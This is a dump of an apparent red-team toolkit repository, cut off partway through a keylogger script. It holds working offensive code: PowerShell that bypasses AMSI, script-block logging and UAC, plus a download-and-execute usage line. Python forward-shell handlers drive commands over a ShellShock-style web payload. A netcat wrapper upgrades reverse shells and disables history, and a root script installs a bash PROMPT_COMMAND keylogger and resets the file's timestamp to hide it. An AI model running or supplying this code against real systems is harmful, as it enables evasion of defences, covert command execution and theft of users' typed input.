├── LICENSE ├── README.md ├── code-execution └── Invoke-Bypass.ps1 ├── credentials └── Invoke-Mimikatz.ps1 ├── detection └── Invoke-TestC2DetectionRule.ps1 ├── handlers ├── forward-shell-v2.py ├── forward-shell.py ├── mybash.sh └── nca ├── keyloggers └── prompt-command-keylogger.sh ├── lateral-movement └── winrm-fs.rb ├── persistence ├── backdoor-passwd.sh └── nohup.sh ├── privilege-escalation ├── Invoke-FileHijackCheck │ ├── Invoke-FileHijackCheck.ps1 │ └── handle.exe ├── Invoke-RunasCs.ps1 ├── JuicyPotato.ps1 └── JuicyPotato32.ps1 ├── scanners └── nmap │ ├── scan.parallel.sh │ └── scan.sh ├── shellcode └── pic.asm ├── shells ├── ConPtyShell.exe ├── Invoke-ConPtyShell.ps1 └── Invoke-ConPtyShell2.ps1 ├── situational-awareness └── procmon.sh └── stealth └── fake-argv ├── Makefile ├── bash-fake-argv.c └── fake /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2018 SnadoTeam 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 4 | 5 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 6 | 7 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RedTeam Scripts by d0nkeys 2 | 3 | ## Categories 4 | 5 | - code-execution 6 | - credentials 7 | - detection 8 | - handlers 9 | - keyloggers 10 | - lateral-movement 11 | - persistence 12 | - privilege-escalation 13 | - scanners 14 | - shells 15 | - situational-awareness 16 | - stealth 17 | -------------------------------------------------------------------------------- /code-execution/Invoke-Bypass.ps1: -------------------------------------------------------------------------------- 1 | $id = random 2 | 3 | iex @" 4 | function Invoke-Bypass-$id-ScriptBlockLog { 5 | # cobbr's Script Block Logging bypass 6 | `$GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static'); 7 | If(`$GPF){ 8 | `$GPC=`$GPF.GetValue(`$null); 9 | If(`$GPC['ScriptB'+'lockLogging']){ 10 | `$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0; 11 | `$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0 12 | } 13 | `$val=[Collections.Generic.Dictionary[string,System.Object]]::new(); 14 | `$val.Add('EnableScriptB'+'lockLogging',0); 15 | `$val.Add('EnableScriptB'+'lockInvocationLogging',0); 16 | `$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=`$val 17 | } Else { 18 | [ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue(`$null,(New-Object Collections.Generic.HashSet[string])) 19 | } 20 | } 21 | "@; 22 | 23 | iex @" 24 | function Invoke-Bypass-$id-AMSI { 25 | # @mattifestation's AMSI bypass 26 | `$Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils'); 27 | `$Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue(`$null,`$true); 28 | } 29 | "@; 30 | 31 | iex @" 32 | function Invoke-Bypass-$id-AMSI2 { 33 | # rastamouse's AMSI bypass (Add-Type 
writes *.cs on disk!!) 34 | `$Ref = ( 35 | "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", 36 | "System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" 37 | ); 38 | 39 | `$Source = @" 40 | using System; 41 | using System.Runtime.InteropServices; 42 | 43 | namespace Bypass$id 44 | { 45 | public class AMSI$id 46 | { 47 | [DllImport("kernel32")] 48 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 49 | [DllImport("kernel32")] 50 | public static extern IntPtr LoadLibrary(string name); 51 | [DllImport("kernel32")] 52 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 53 | 54 | [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)] 55 | static extern void MoveMemory(IntPtr dest, IntPtr src, int size); 56 | 57 | public static int Disable() 58 | { 59 | string hexbuffer = "41 6d 73 69 53 63 61 6e 42 75 66 66 65 72"; 60 | string buffer=""; 61 | string[] hexbuffersplit = hexbuffer.Split(' '); 62 | foreach (String hex in hexbuffersplit) 63 | { 64 | int value = Convert.ToInt32(hex, 16); 65 | buffer+= Char.ConvertFromUtf32(value); 66 | } 67 | IntPtr Address = GetProcAddress(LoadLibrary("a"+ "msi"+ ".dl" +"l"), buffer); 68 | UIntPtr size = (UIntPtr)5; 69 | uint p = 0; 70 | VirtualProtect(Address, size, 0x40, out p); 71 | byte c1=0xB8,c2=0x80; 72 | Byte[] Patch = {c1, 0x57, 0x00, 0x07, c2, 0xC3 }; 73 | IntPtr unmanagedPointer = Marshal.AllocHGlobal(6); 74 | Marshal.Copy(Patch, 0, unmanagedPointer, 6); 75 | MoveMemory(Address, unmanagedPointer, 6); 76 | 77 | return 0; 78 | } 79 | } 80 | } 81 | `"@; 82 | 83 | Add-Type -ReferencedAssemblies `$Ref -TypeDefinition `$Source -Language CSharp; 84 | iex "[Bypass$id.AMSI$id]::Disable() | Out-Null" 85 | } 86 | "@; 87 | 88 | iex @" 89 | function Invoke-Bypass-$id-UACSilentCleanup { 90 | # (Add-Type writes *.cs on disk!!) 
91 | # https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html 92 | 93 | Param( 94 | [Parameter(Mandatory=`$True,HelpMessage="Enter command to execute.")] 95 | `$Command 96 | ) 97 | 98 | `$Source = @" 99 | using System; 100 | using Microsoft.Win32; 101 | using System.Diagnostics; 102 | 103 | namespace UACBypass 104 | { 105 | public class SilentCleanup$id 106 | { 107 | public static void exec(string payload) 108 | { 109 | // Payload to be executed 110 | Console.WriteLine("[+] Starting Bypass UAC."); 111 | 112 | try 113 | { 114 | // Registry Key Modification 115 | RegistryKey key; 116 | key = Registry.CurrentUser.CreateSubKey(@"Environment"); 117 | key.SetValue("windir", "cmd.exe /c " + payload + " & ", RegistryValueKind.String); 118 | key.Close(); 119 | 120 | Console.WriteLine("[+] Enviroment Variabled %windir% Created."); 121 | } 122 | catch 123 | { 124 | Console.WriteLine("[-] Unable to Create the Enviroment Variabled %windir%."); 125 | Console.WriteLine("[-] Exit."); 126 | } 127 | 128 | //Wait 5 sec before execution 129 | Console.WriteLine("[+] Waiting 5 seconds before execution."); 130 | System.Threading.Thread.Sleep(5000); 131 | 132 | // Trigger the UAC Bypass 133 | try 134 | { 135 | ProcessStartInfo startInfo = new ProcessStartInfo(); 136 | startInfo.CreateNoWindow = true; 137 | startInfo.UseShellExecute = false; 138 | startInfo.FileName = "schtasks.exe"; 139 | startInfo.Arguments = @"/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I"; 140 | Process.Start(startInfo); 141 | 142 | Console.WriteLine("[+] UAC Bypass Application Executed."); 143 | } 144 | catch 145 | { 146 | Console.WriteLine("[-] Unable to Execute the Application schtasks.exe to perform the bypass."); 147 | } 148 | 149 | //Clean Registry 150 | DeleteKey(); 151 | 152 | Console.WriteLine("[-] Exit."); 153 | } 154 | 155 | static void DeleteKey() 156 | { 157 | //Wait 5 sec before cleaning 158 | Console.WriteLine("[+] Registry Cleaning will start in 5 seconds."); 159 | 
System.Threading.Thread.Sleep(5000); 160 | 161 | try 162 | { 163 | var rkey = Registry.CurrentUser.OpenSubKey(@"Environment", true); 164 | 165 | // Validate if the Key Exist 166 | if (rkey != null) 167 | { 168 | try 169 | { 170 | rkey.DeleteValue("windir"); 171 | rkey.Close(); 172 | } 173 | catch (Exception err) 174 | { 175 | Console.WriteLine(@"[-] Unable to Delete the Registry key (Environment). Error " + err.Message); 176 | } 177 | } 178 | 179 | Console.WriteLine("[+] Registry Cleaned."); 180 | } 181 | catch 182 | { 183 | Console.WriteLine("[-] Unable to Clean the Registry."); 184 | } 185 | } 186 | } 187 | } 188 | `"@; 189 | 190 | Add-Type -TypeDefinition `$Source -Language CSharp; 191 | iex "[UACBypass.SilentCleanup$id]::exec(```$Command) | Out-Null" 192 | } 193 | "@; 194 | 195 | # Usage 196 | # $browser = New-Object System.Net.WebClient; $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials; iex($browser.downloadstring("https://raw.githubusercontent.com/d0nkeys/redteam/master/code-execution/Invoke"+"-"+"Bypass.ps1")); 197 | # iex "$(Get-Command 'Invoke-Bypass-*-AMSI')" 198 | # iex "$(Get-Command 'Invoke-Bypass-*-AMSI2')" 199 | # iex "$(Get-Command 'Invoke-Bypass-*-ScriptBlockLog')" 200 | # iex "$(Get-Command 'Invoke-Bypass-*-UACSilentCleanup') -Command cmd.exe" 201 | -------------------------------------------------------------------------------- /detection/Invoke-TestC2DetectionRule.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-TestC2DetectionRule() { 2 | <# 3 | 4 | .SYNOPSIS 5 | 6 | Simple function to test C2 detection rule 7 | 8 | Author: Francesco Soncina (phra) 9 | License: BSD 3-Clause 10 | 11 | .DESCRIPTION 12 | 13 | This function simply does an HTTP GET request every 10 seconds to the specified URL. 14 | 15 | .PARAMETER Url 16 | 17 | The URL to send the HTTP GET request to. 18 | 19 | .PARAMETER Seconds 20 | 21 | The seconds to wait between HTTP GET requests. 
22 | 23 | .EXAMPLE 24 | 25 | Invoke-TestC2DetectionRule -Url "https://example.com/c2.php" 26 | 27 | Request https://example.com/c2.php every 10 seconds 28 | 29 | .EXAMPLE 30 | 31 | Invoke-TestC2DetectionRule -Url "https://example.com/c2.php" -Seconds 1 32 | 33 | Request https://example.com/c2.php every second 34 | 35 | .EXAMPLE 36 | 37 | $browser = New-Object System.Net.WebClient; $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials; iex($browser.downloadstring("https://raw.githubusercontent.com/d0nkeys/redteam/master/detection/Invoke-TestC2DetectionRule.ps1")); Invoke-TestC2DetectionRule -Url "https://example.com/c2.php" -Seconds 1 38 | 39 | Download and execute this scripts from GitHub and request https://example.com/c2.php every second 40 | 41 | #> 42 | 43 | Param( 44 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 45 | [Alias('UrlPath')] 46 | [String] 47 | [ValidateNotNullOrEmpty()] 48 | $Url, 49 | 50 | [String] 51 | $Seconds = 10 52 | ) 53 | 54 | $browser = New-Object System.Net.WebClient; 55 | $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials; 56 | 57 | $n = 0; 58 | 59 | echo "Requesting $($Url) every $($Seconds) seconds.." 60 | 61 | do { 62 | $browser.downloadString($Url) | Out-Null; 63 | echo "#$($n) => $($browser.downloadString($Url).Substring(0, 30))..." 
64 | $n += 1; 65 | Start-Sleep -s $Seconds; 66 | } until ($False) 67 | } 68 | -------------------------------------------------------------------------------- /handlers/forward-shell-v2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # 4 | # Forward Shell Skeleton code that was used in IppSec's Stratosphere Video 5 | # -- https://www.youtube.com/watch?v=uMwcJQcUnmY 6 | # Authors: ippsec, 0xdf, lupman, phra 7 | 8 | 9 | import base64 10 | import random 11 | import sys 12 | import requests 13 | import threading 14 | import time 15 | import readline 16 | import tty 17 | import termios 18 | import subprocess 19 | 20 | 21 | def exec_com(command, timeout = 50): 22 | if timeout == 0: 23 | return subprocess.Popen(command, shell=True) 24 | return subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout.read().decode().strip() 25 | 26 | class WebShell(object): 27 | 28 | # Initialize Class + Setup Shell, also configure proxy for easy history/debuging with burp 29 | def __init__(self, interval=0.1, proxies='http://127.0.0.1:8080'): 30 | self.proxies = {'http' : proxies} 31 | session = random.randrange(10000,99999) 32 | print(f"[*] Session ID: {session}") 33 | self.pwd = f'/dev/shm' 34 | self.stdin = f'{self.pwd}/input.{session}' 35 | self.stdout = f'{self.pwd}/output.{session}' 36 | self.interval = interval 37 | 38 | # set up shell 39 | print("[*] Setting up fifo shell on target") 40 | MakePwd = f"mkdir -p {self.pwd}" 41 | MakeNamedPipes = f"mkfifo {self.stdin}; /bin/sh -c '(tail -f {self.stdin} | /bin/sh 2>&1) >> {self.stdout}' &" 42 | self.RunRawCmd(MakePwd, timeout=1) 43 | self.RunRawCmd(MakeNamedPipes, timeout=0) 44 | time.sleep(self.interval) 45 | 46 | # set up read thread 47 | print("[*] Setting up read thread") 48 | self.interval = interval 49 | thread = threading.Thread(target=self.ReadThread, args=()) 50 | thread.daemon = True 51 | 
thread.start() 52 | 53 | # Read $session, output text to screen & wipe session 54 | def ReadThread(self): 55 | GetOutput = f"/bin/cat {self.stdout} | python -m base64" 56 | while True: 57 | result = self.RunRawCmd(GetOutput) #, proxy=None) 58 | if result: 59 | try: 60 | result = base64.b64decode(result) 61 | sys.stdout.buffer.write(result) 62 | sys.stdout.buffer.flush() 63 | ClearOutput = f': > {self.stdout}' 64 | self.RunRawCmd(ClearOutput) 65 | except Exception: 66 | pass 67 | time.sleep(self.interval) 68 | 69 | # Execute Command. 70 | def RunRawCmd(self, cmd, timeout=50, proxy=False): 71 | if proxy: 72 | proxies = self.proxies 73 | else: 74 | proxies = {} 75 | 76 | try: 77 | return exec_com(cmd, timeout) 78 | except: 79 | pass 80 | 81 | # Send b64'd command to RunRawCommand 82 | def WriteCmd(self, cmd): 83 | b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8') 84 | stage_cmd = f"echo {b64cmd} | python3 -m base64 -d >> {self.stdin} &" 85 | self.RunRawCmd(stage_cmd) 86 | time.sleep(self.interval * 1.5) 87 | 88 | def WriteSingleCmd(self, cmd): 89 | b64cmd = base64.b64encode(cmd).decode() 90 | stage_cmd = f"echo -n '{b64cmd}' | python3 -m base64 -d >> {self.stdin} &" 91 | self.RunRawCmd(stage_cmd) 92 | time.sleep(self.interval * 1.5) 93 | 94 | def UpgradeShell(self): 95 | # upgrade shell 96 | UpgradeShell = """python3 -c 'import pty; pty.spawn("bash")'""" 97 | self.WriteCmd(UpgradeShell) 98 | 99 | def UpgradeShellTTY(self): 100 | rows, cols = subprocess.check_output(['stty', 'size']).decode().split() 101 | UpgradeShell = f"reset; export SHELL=bash; export TERM=xterm-256color; stty rows {rows} cols {cols}" 102 | self.WriteCmd(UpgradeShell) 103 | 104 | user = exec_com('whoami') 105 | host = exec_com('hostname -s') 106 | cds = '' 107 | isTTY = False 108 | prompt = '' 109 | stdin = sys.stdin.fileno() 110 | stdout = sys.stdout.fileno() 111 | old_settings_stdin = termios.tcgetattr(stdin) 112 | old_settings_stdout = 
termios.tcgetattr(stdout) 113 | 114 | S = WebShell() 115 | while True: 116 | if not isTTY: 117 | pwd = exec_com(cds + 'pwd') 118 | prompt = f'{user}@{host}:{pwd}$ ' 119 | else: 120 | prompt = '' 121 | 122 | cmd = input(prompt) 123 | if cmd.startswith('cd'): 124 | cds += cmd + ';' 125 | 126 | if cmd == "upgrade": 127 | isTTY = True 128 | S.UpgradeShell() 129 | tty.setraw(stdin) 130 | tty.setraw(stdout) 131 | S.UpgradeShellTTY() 132 | while True: 133 | c = sys.stdin.buffer.raw.read(1) 134 | sys.stdin.flush() 135 | S.WriteSingleCmd(c) 136 | if int(c[0]) == 4: 137 | S.WriteCmd(f"rm -rf {S.pwd}; exit") 138 | termios.tcsetattr(stdin, termios.TCSADRAIN, old_settings_stdin) 139 | termios.tcsetattr(stdout, termios.TCSADRAIN, old_settings_stdout) 140 | sys.exit(0) 141 | elif cmd == "exit": 142 | S.WriteCmd(f"rm -rf {S.pwd}; exit") 143 | sys.exit(0) 144 | elif cmd.startswith(":upload "): 145 | splitted = cmd.split(" ") 146 | if len(splitted) < 2: 147 | print("[?] :upload [dst]") 148 | else: 149 | src = splitted[1] 150 | dst = splitted[2] if len(splitted)>2 else splitted[1].split('/')[-1] 151 | fd = open(src, 'rb') 152 | while True: 153 | data = fd.read(1024) 154 | if not data: 155 | break 156 | datab64 = base64.b64encode(data).decode() 157 | S.WriteCmd(f"echo -n {datab64} | python -m base64 -d >> {dst}") 158 | print(f"[?] Uploading: {src} -> {dst}") 159 | print(f"[+] Uploaded: {src} -> {dst}") 160 | elif cmd.startswith(":download "): 161 | splitted = cmd.split(" ") 162 | if len(splitted) < 2: 163 | print("[?] :download [dst]") 164 | else: 165 | src = splitted[1] 166 | dst = splitted[2] if len(splitted)>2 else splitted[1].split('/')[-1] 167 | i = 0 168 | fd = open(dst, 'wb', buffering=0) 169 | while True: 170 | datab64 = exec_com(f"dd skip={i*1024} count=1024 if={src} bs=1 status=none | python -m base64") 171 | if not datab64: 172 | break 173 | data = base64.b64decode(datab64) 174 | fd.write(data) 175 | i += 1 176 | print(f"[?] 
Downloading: {src} -> {dst}") 177 | print(f"[+] Downloaded: {src} -> {dst}") 178 | else: 179 | S.WriteCmd(cmd) 180 | -------------------------------------------------------------------------------- /handlers/forward-shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # 4 | # Forward Shell Skeleton code that was used in IppSec's Stratosphere Video 5 | # -- https://www.youtube.com/watch?v=uMwcJQcUnmY 6 | # Authors: ippsec, 0xdf 7 | 8 | 9 | import base64 10 | import random 11 | import requests 12 | import threading 13 | import time 14 | 15 | class WebShell(object): 16 | 17 | # Initialize Class + Setup Shell, also configure proxy for easy history/debuging with burp 18 | def __init__(self, interval=1.3, proxies='http://127.0.0.1:8080'): 19 | # MODIFY THIS, URL 20 | self.url = r"http://10.10.10.56/cgi-bin/cat" 21 | self.proxies = {'http' : proxies} 22 | session = random.randrange(10000,99999) 23 | print(f"[*] Session ID: {session}") 24 | self.stdin = f'/dev/shm/input.{session}' 25 | self.stdout = f'/dev/shm/output.{session}' 26 | self.interval = interval 27 | 28 | # set up shell 29 | print("[*] Setting up fifo shell on target") 30 | MakeNamedPipes = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}" 31 | self.RunRawCmd(MakeNamedPipes, timeout=0.1) 32 | 33 | # set up read thread 34 | print("[*] Setting up read thread") 35 | self.interval = interval 36 | thread = threading.Thread(target=self.ReadThread, args=()) 37 | thread.daemon = True 38 | thread.start() 39 | 40 | # Read $session, output text to screen & wipe session 41 | def ReadThread(self): 42 | GetOutput = f"/bin/cat {self.stdout}" 43 | while True: 44 | result = self.RunRawCmd(GetOutput) #, proxy=None) 45 | if result: 46 | print(result) 47 | ClearOutput = f'echo -n "" > {self.stdout}' 48 | self.RunRawCmd(ClearOutput) 49 | time.sleep(self.interval) 50 | 51 | # Execute Command. 
52 | def RunRawCmd(self, cmd, timeout=50, proxy="http://127.0.0.1:8080"): 53 | #print(f"Going to run cmd: {cmd}") 54 | # MODIFY THIS: This is where your payload code goes 55 | payload += cmd 56 | 57 | if proxy: 58 | proxies = self.proxies 59 | else: 60 | proxies = {} 61 | 62 | # MODIFY THIS: Payload in User-Agent because it was used in ShellShock 63 | headers = {'User-Agent': payload} 64 | try: 65 | r = requests.get(self.url, headers=headers, proxies=proxies, timeout=timeout) 66 | return r.text 67 | except: 68 | pass 69 | 70 | # Send b64'd command to RunRawCommand 71 | def WriteCmd(self, cmd): 72 | b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8') 73 | stage_cmd = f'echo {b64cmd} | base64 -d > {self.stdin}' 74 | self.RunRawCmd(stage_cmd) 75 | time.sleep(self.interval * 1.1) 76 | 77 | def UpgradeShell(self): 78 | # upgrade shell 79 | UpgradeShell = """python3 -c 'import pty; pty.spawn("/bin/bash")'""" 80 | self.WriteCmd(UpgradeShell) 81 | 82 | prompt = "Please Subscribe> " 83 | S = WebShell() 84 | while True: 85 | cmd = input(prompt) 86 | if cmd == "upgrade": 87 | prompt = "" 88 | S.UpgradeShell() 89 | else: 90 | S.WriteCmd(cmd) 91 | -------------------------------------------------------------------------------- /handlers/mybash.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | unset HISTFILE 4 | 5 | # FUNCTIONS 6 | 7 | nscan () { 8 | [[ $# -ne 1 ]] && echo "No IP address provided" && return 1 9 | 10 | for i in {1..65535} ; do 11 | SERVER="$1" 12 | PORT=$i 13 | (echo > /dev/tcp/$SERVER/$PORT) >& /dev/null && 14 | echo "Port $PORT seems to be open" 15 | done 16 | } 17 | 18 | # ALIASES 19 | 20 | alias ..="cd .." 
21 | alias ls="ls -liahF --color=always" 22 | alias l="ls" 23 | alias less="less -R" 24 | 25 | # MISC 26 | 27 | export PS1='\[\033[36m\][\D{%T}] \[\e[01;32m\]\u@\h\[\e[01;31m\] \w \[\e[01;39m\]\$\[\e[00m\] ' 28 | -------------------------------------------------------------------------------- /handlers/nca: -------------------------------------------------------------------------------- 1 | #!/usr/bin/expect 2 | # nca - nc wrapper by Donkeys team 3 | # Requires: expect, nc and optionally tmux 4 | 5 | set LISTEN false 6 | set ADDR "0.0.0.0" 7 | set PORT 0 8 | set TMUX false 9 | set UDP "" 10 | set KILL true 11 | 12 | set argsCount [llength $argv]; 13 | set i 0 14 | while { $i < $argsCount } { 15 | switch [lindex $argv $i] { 16 | "-l" { 17 | set LISTEN true 18 | } 19 | "-u" { 20 | set UDP "-u" 21 | } 22 | "-t" { 23 | set TMUX true 24 | } 25 | "-k" { 26 | set KILL false 27 | } 28 | default { 29 | if { $i == $argsCount-2 } { 30 | set ADDR [lindex $argv $i] 31 | } else { 32 | set PORT [lindex $argv $i] 33 | } 34 | } 35 | } 36 | set i [expr $i+1]; 37 | } 38 | 39 | if { $PORT > 0 && ($LISTEN == true || $ADDR != "0.0.0.0") } { 40 | 41 | if { $LISTEN == true } { 42 | if { $ADDR == "0.0.0.0" } { 43 | set CMD "(nc $UDP -lvp $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')" 44 | } else { 45 | set CMD "(nc $UDP -lvp $PORT -s $ADDR; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')" 46 | } 47 | set MSG "\[\033\[94m*\033\[0m\] Waiting for connections on $ADDR:$PORT" 48 | set EXP "onnect" 49 | } else { 50 | set CMD "(nc -v $UDP $ADDR $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5''\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')" 51 | #set CMD "($arg3 nc -v $ADDR $PORT; echo -e '\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3')" 52 | set MSG "\[\033\[94m*\033\[0m\] Connecting to $ADDR:$PORT" 53 | set EXP "open" 54 | } 55 | 56 | log_user 0 57 | set timeout -1 58 | 59 | spawn "/bin/bash" 60 | send "$CMD\n" 61 | puts $MSG 62 | 63 | 
expect { 64 | $EXP { 65 | puts "\[\033\[92m+\033\[0m\] Connected" 66 | 67 | send "echo 'un''ix'\n" 68 | #sleep 0.2 69 | sleep 1.5 70 | expect { 71 | "unix" { 72 | puts "\[\033\[92m+\033\[0m\] Unix detected" 73 | 74 | if { $LISTEN == true && $TMUX == true } { 75 | send \x1A 76 | if { $ADDR != "0.0.0.0" } { 77 | send "tmux new-window -d '$::argv0 -l -t $ADDR $PORT'\n" 78 | } else { 79 | send "tmux new-window -d '$::argv0 -l -t $PORT'\n" 80 | } 81 | send "fg\n" 82 | } 83 | } 84 | "'un''ix'" { 85 | puts "\[\033\[92m+\033\[0m\] Windows detected" 86 | 87 | if { $LISTEN == true && $TMUX == true } { 88 | send \x1A 89 | if { $ADDR != "0.0.0.0" } { 90 | send "tmux new-window -d '$::argv0 -l -t $ADDR $PORT'\n" 91 | } else { 92 | send "tmux new-window -d '$::argv0 -l -t $PORT'\n" 93 | } 94 | send "fg\n" 95 | 96 | expect ")" 97 | expect ")" 98 | expect ")" 99 | } 100 | 101 | send "\n" 102 | interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3" return 103 | 104 | puts "" 105 | puts "\[\033\[94m*\033\[0m\] Terminated" 106 | exit 107 | } 108 | } 109 | send "unset HISTFILE\n" 110 | send "p=`which python python2 python3 python2.7 python3.5 python2.6 python3.4 python3.6 | xargs | cut -d ' ' -f 1`;if \[ ! -z \$p \]; then echo 'P''TY-OK'; \$p -c 'import pty;pty.spawn(\"/bin/bash\")'; else p=`which script | xargs | cut -d ' ' -f 1`;if \[ ! 
-z \$p \]; then echo 'P''TY-OK'; \$p -qc /bin/bash /dev/null; else echo 'P''TY-ERR'; fi; fi;\n" 111 | expect { 112 | "PTY-OK" { 113 | set ROWS [exec tput lines] 114 | set COLS [exec tput cols] 115 | puts "\[\033\[92m+\033\[0m\] Spawning pty" 116 | expect { 117 | "$ " { 118 | } 119 | "# " { 120 | } 121 | "% " { 122 | } 123 | } 124 | send \x1A 125 | puts "\[\033\[94m*\033\[0m\] Setting terminal" 126 | expect ":" 127 | send "stty raw -echo\n" 128 | send "fg\n" 129 | expect { 130 | "$ " { 131 | } 132 | "# " { 133 | } 134 | "% " { 135 | } 136 | } 137 | if { $KILL == true } { 138 | send "kill -s 9 `ps -fp \$PPID | awk \"/\$PPID/\"' { print \$3 } '`\n" 139 | } 140 | send "reset\n" 141 | expect { 142 | "$ " { 143 | } 144 | "# " { 145 | } 146 | "% " { 147 | } 148 | } 149 | send "id\n" 150 | expect { 151 | "Terminal type?" { 152 | send "xterm-256color\n" 153 | } 154 | "uid=" { 155 | } 156 | } 157 | send "stty rows $ROWS columns $COLS\n" 158 | send "export SHELL=bash\n" 159 | send "export TERM=xterm-256color\n" 160 | send "unset HISTFILE\n" 161 | send "clear\n" 162 | #send "uname -a; id\n" 163 | sleep 0.5 164 | interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\n" return 165 | 166 | } 167 | "PTY-ERR" { 168 | puts "\[\033\[91m-\033\[0m\] Can't spawn pty" 169 | puts "\[\033\[92m+\033\[0m\] Interacting" 170 | send "uname -a; id\n" 171 | interact -o "\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3\xf5\xe7\xf3" return 172 | } 173 | } 174 | puts "" 175 | puts "\[\033\[94m*\033\[0m\] Terminated" 176 | } 177 | "Connection refused" { 178 | puts "\[\033\[91m-\033\[0m\] Connection refused" 179 | } 180 | "Permission denied" { 181 | puts "\[\033\[91m-\033\[0m\] Permission denied" 182 | } 183 | "forward host lookup failed" { 184 | puts "\[\033\[91m-\033\[0m\] Forward host lookup failed" 185 | } 186 | "Cannot assign requested address" { 187 | puts "\[\033\[91m-\033\[0m\] Cannot assign requested address" 188 | } 189 | "invalid port" { 190 | puts 
"\[\033\[91m-\033\[0m\] Invalid port" 191 | } 192 | "invalid local port" { 193 | puts "\[\033\[91m-\033\[0m\] Invalid local port" 194 | } 195 | "Address already in use" { 196 | puts "\[\033\[91m-\033\[0m\] Address already in use" 197 | } 198 | "*** buffer overflow detected ***" { 199 | puts "\[\033\[91m-\033\[0m\] *** buffer overflow detected ***" 200 | } 201 | } 202 | exit 203 | } else { 204 | puts "Usage: $::argv0 \[-l\] \[-t\] \[addr\] port" 205 | } 206 | -------------------------------------------------------------------------------- /keyloggers/prompt-command-keylogger.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set +o history 4 | echo "[i] - history disabled.." 5 | 6 | if [[ $EUID > 0 ]]; then 7 | echo "[!] - you have to be root ¯\_(ツ)_/¯" 8 | exit 9 | fi 10 | 11 | output=${1:-"/dev/shm/.log"} 12 | mtime=`stat -c "%y" /etc/bash.bashrc` 13 | 14 | echo "[!] - /etc/bash.bashrc was modified @ ${mtime}" 15 | echo "[!] - setting up PROMPT_COMMAND keylogger.." 16 | 17 | echo "export PROMPT_COMMAND='RETRN_VAL=\$?;echo \"\$(whoami) [\$\$]: \$(history 1 | sed \"s/^[ ]*[0-9]\+[ ]*//\" ) [\$RETRN_VAL]\" >> ${output}'" >> /etc/bash.bashrc 18 | 19 | echo "[!] - restoring mtime of /etc/bash.bashrc to ${mtime}" 20 | touch -d "${mtime}" /etc/bash.bashrc 21 | 22 | echo "[!] 
